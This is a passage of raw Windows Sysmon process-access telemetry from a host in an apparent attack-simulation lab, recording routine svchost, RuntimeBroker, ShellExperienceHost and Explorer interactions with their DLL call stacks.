ndows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll
+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+dbd39|C:\Windows\System32\Windows.Storage.dll+dbb65|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\